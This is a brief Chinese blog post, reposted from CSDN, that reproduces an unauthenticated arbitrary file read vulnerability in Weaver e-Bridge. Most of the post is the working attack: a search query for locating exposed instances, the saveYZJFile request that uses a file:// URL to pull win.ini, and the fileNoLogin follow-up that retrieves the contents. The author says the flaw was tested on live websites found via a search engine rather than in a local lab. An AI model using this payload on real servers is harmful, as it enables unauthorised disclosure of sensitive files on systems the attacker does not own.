泛微e-Bridge未授权文件读取漏洞复现

简介

泛微云桥 e-Bridge 存在未经授权读取任意文件漏洞，可利用该漏洞，实现任意文件读取，获取敏感信息。

title="泛微云桥e-Bridge"

因为不是在本地搭建的漏洞复现环境，利用空间搜索引擎只找到很少量存在漏洞的网站，大多数都开启了身份验证，找到的也都是基于Windows的，所以就不在介绍Linux上搭建的了。

/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C://windows/win.ini&fileExt=txt

直接在url地址后添加

之后复制返回的值进行访问

/file/fileNoLogin/id值

标签：安全 web安全

本文转载自: https://blog.csdn.net/l1593572468/article/details/123289403
版权归原作者 Ling-cheng 所有，如有侵权，请联系我们删除。